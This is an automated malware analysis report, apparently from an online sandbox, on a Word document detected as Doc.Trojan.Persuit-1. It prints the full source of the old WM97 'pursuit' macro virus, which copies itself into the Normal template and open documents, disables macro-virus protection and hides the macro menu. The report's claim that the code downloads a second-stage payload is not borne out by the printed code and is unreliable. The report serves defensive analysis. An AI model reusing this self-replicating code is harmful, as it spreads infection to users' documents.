MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of malicious intent. The VBA script attempts to export a component to 'C:\IE32.dll' and then import it, suggesting it's designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.Persuit-1' further supports the malicious classification.
Heuristics 6
-
ClamAV: Doc.Trojan.Persuit-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Persuit-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub Autoclose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1666 bytes |
SHA-256: e6b7146afe14bd9a3cdfa82b04c72b38c2b4d308a6afffce7b0b35b2d60f3879 |
|||
|
Detection
ClamAV:
Doc.Trojan.Persuit-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "pursuit"
Function pursuit()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("pursuit").Export "C:\IE32.dll"
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "pursuit" Then NormInfect = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "pursuit" Then docinfect = True
Next I
If NormInfect = False Then Set goinfect = NormalTemplate.VBProject
If docinfect = False Then Set goinfect = ActiveDocument.VBProject
goinfect.VBComponents.Import "C:\IE32.dll"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Function
Sub AutoOpen()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.EnableCancelKey = False
Call payload
End Sub
Sub Autoclose()
On Error Resume Next
commandbars("tools").Controls("macro").Delete
Call pursuit
End Sub
Sub FileTemplates()
End Sub
Sub toolsmacro()
End Sub
Sub payload()
If Day(Now) = 5 Then
MsgBox "I'm in hot Pursuit", 0, "Psyclone X [PE]"
commandbars("Help").Controls("About Microsoft Word").Caption = "Pursuit By Psyclone X[PE]"
End If
End Sub
'''''''''''''''''''''''''''''''''''
'WM97.pursuit.a by Psyclone X [PE]'
'The Pencil Erasers: '
'[SeZ] [Psyclone X] [RaTtRaP] '
'''''''''''''''''''''''''''''''''''
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.